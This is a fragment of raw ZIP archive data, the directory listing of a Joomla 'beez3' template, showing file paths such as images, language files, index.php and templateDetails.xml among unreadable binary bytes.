flbeez3/images/slider_minus.pngnu�[���PK՜�\*�ݷ��plbeez3/images/footer_bg.gifnu�[���PK՜�\�~6'
'
�ylbeez3/images/slider_plus.pngnu�[���PK՜�\q?�����lbeez3/images/news.gifnu�[���PK՜�\���hzz΄lbeez3/images/minus.pngnu�[���PK՜�\�Y�pp��lbeez3/images/arrow.pngnu�[���PK՜�\��'@��D�lbeez3/images/all_bg.gifnu�[���PK՜�\;����(�lbeez3/language/en-GB/en-GB.tpl_beez3.ininu�[���PK՜�\�S26��,�lbeez3/language/en-GB/en-GB.tpl_beez3.sys.ininu�[���PK՜�\V�
c��j�lbeez3/template_preview.pngnu�[���PK՜�\^|#T�"�"�gnbeez3/index.phpnu�[���PK՜�\2H�	����nbeez3/templateDetails.xmlnu�[���PK՜�\5���9!9!͜nbeez3/error.phpnu�[���PK՜�\"
����E�nbeez3/favicon.iconu�[���PK՜�\�Yb�U�Ui�nbeez3/template_thumbnail.pngnu�[���PK՜�\~�ƃ��zobeez3/jsstrings.phpnu�[���PK��kV"o